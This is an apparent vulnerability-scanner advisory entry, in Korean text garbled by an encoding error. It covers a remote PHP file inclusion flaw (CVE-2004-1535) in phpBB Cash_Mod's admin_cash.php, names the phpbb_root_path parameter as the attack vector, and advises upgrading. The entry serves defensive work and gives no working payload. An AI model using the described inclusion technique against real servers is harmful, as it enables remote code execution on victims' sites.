| Ãë¾àÁ¡ID |
21399 |
| À§Çèµµ |
40 |
| Æ÷Æ® |
80, ... |
| ÇÁ·ÎÅäÄÝ |
TCP |
| ºÐ·ù |
CGI |
| »ó¼¼¼³¸í |
ÇØ´ç À¥¼¹ö¿¡ ¼³Ä¡µÈ phpBB¿¡´Â admin_cash.php¿¡ ÀÖ´Â ¿ø°Ý PHP ÆÄÀÏ Æ÷ÇÔ Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù.
phpBB´Â °Ô½ÃÆÇ(bulletin board)À» À§ÇÑ ¿ÀÇ ¼Ò½º ¼ÒÇÁÆ®¿þ¾î ÆÐÅ°Áö·Î½á µ¥ÀÌÅͺ£À̽º·Î´Â MySQL, MS-SQL, PostgreSQL, Access/ODBC µîÀ» »ç¿ëÇÑ´Ù. phpBB 2.0.10 ÀÌÇÏÀÇ ¹öÀüµéÀº phpBB Cash_Mod ¸ðµâ¿¡ ÀÖ´Â Ãë¾àÁ¡À¸·Î ÀÎÇÏ¿© ¿ø°ÝÁöÀÇ °ø°ÝÀÚ°¡ Á¦ 3ÀÇ ¼¹ö »ó¿¡¼ È£½ºÆÃÇÏ´Â ¾ÇÀÇÀûÀÎ PHP ÆÄÀϵéÀ» Æ÷ÇÔ(Include)ÇÒ ¼ö ÀÖ°Ô ÇØ ÁØ´Ù. ¸¸¾à allow_url_fopen ±×¸®°í register_globals ¿É¼ÇµéÀÌ php.ini ÆÄÀÏ¿¡¼ »ç¿ë ÇÔÀ¸·Î ¼³Á¤ÇÏ¿´´Ù¸é, Àμö·Î½á ¿ø°ÝÁö ½Ã½ºÅÛ »óÀÇ ¾ÇÀÇÀûÀÎ PHP ÆÄÀÏÀ» ¸í±âÇÑ "phpbb_root_path" º¯¼ö¸¦ ÀÌ¿ëÇÏ¿© admin_cash.php ½ºÅ©¸³Æ®·Î Àß Á¶ÀÛµÈ URL ¿äûÀ» º¸³¿À¸·Î½á, ¿ø°ÝÁöÀÇ °ø°ÝÀÚ´Â ´ë»ó ¼¹ö°¡ ÀÓÀÇÀÇ PHP ÆÄÀÏÀ» Æ÷ÇÔ(include)ÇÏ¿© Ãë¾àÇÑ À¥ ¼¹ö »ó¿¡¼ ½ÇÇàµÇµµ·Ï ÇÒ ¼ö ÀÖ´Ù.
* Âü°í »çÀÌÆ®:
http://archives.neohapsis.com/archives/bugtraq/2004-11/0235.html
http://archives.neohapsis.com/archives/bugtraq/2004-11/0252.html
http://archives.neohapsis.com/archives/bugtraq/2004-11/0238.html
http://archives.neohapsis.com/archives/bugtraq/2004-11/0227.html
* ¿µÇâÀ» ¹Þ´Â Ç÷§Æû:
phpBB Group, phpBB 2.0.10 ÀÌÇÏÀÇ ¹öÀüµé
¸ðµç ¿î¿µÃ¼Á¦ ¸ðµç ¹öÀü |
| ÇØ°áÃ¥ |
phpBB À¥ »çÀÌÆ®ÀÎ http://www.phpbb.com/index.php ¿¡¼ ±¸ÇÒ ¼ö ÀÖ´Â phpBBÀÇ °¡Àå ÃֽŠ¹öÀü(2.0.11 ȤÀº ÀÌÈÄ)À¸·Î ¾÷±×·¹À̵å ÇÏ¿©¾ß ÇÑ´Ù. |
| °ü·Ã URL |
CVE-2004-1535 (CVE) |
| °ü·Ã URL |
11701 (SecurityFocus) |
| °ü·Ã URL |
18151 (ISS) |
|
